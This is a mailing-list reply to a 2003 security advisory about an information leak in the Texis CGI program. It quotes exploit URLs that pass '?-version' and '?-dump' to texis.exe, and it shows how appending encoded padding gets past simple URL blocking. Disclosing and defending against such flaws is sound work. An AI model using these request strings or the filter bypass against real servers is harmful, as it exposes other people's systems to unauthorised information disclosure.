Re: @(#)Mordred Labs advisory - Texis sensitive information leak

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> //@(#) Mordred Security Labs advisory
>
> Release date: March 15, 2003
> Name: Texis sensitive information leak
> Versions affected: all versions
> Risk: average
> Author: Sir Mordred (mordred@s-mail.com, http://mslabs.iwebland.com)

> III. Exploit:
>
> http://victim.com/texis.exe/?-version
> http://victim.com/texis.exe/?-dump

Please note that simply blocking URL's ending in "?-dump" and "?-version"
won't work. You can append a space and additional text, such as:

http://www.example.org/cgi-bin/texis.exe?-dump%20kjshkjhskjsh.html

I didn't bother to test any other special characters or encoding (i.e.
UNICODE), I suspect there may be other ones that can be used.

Kurt Seifried, kurt@seifried.org
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http://seifried.org/security/


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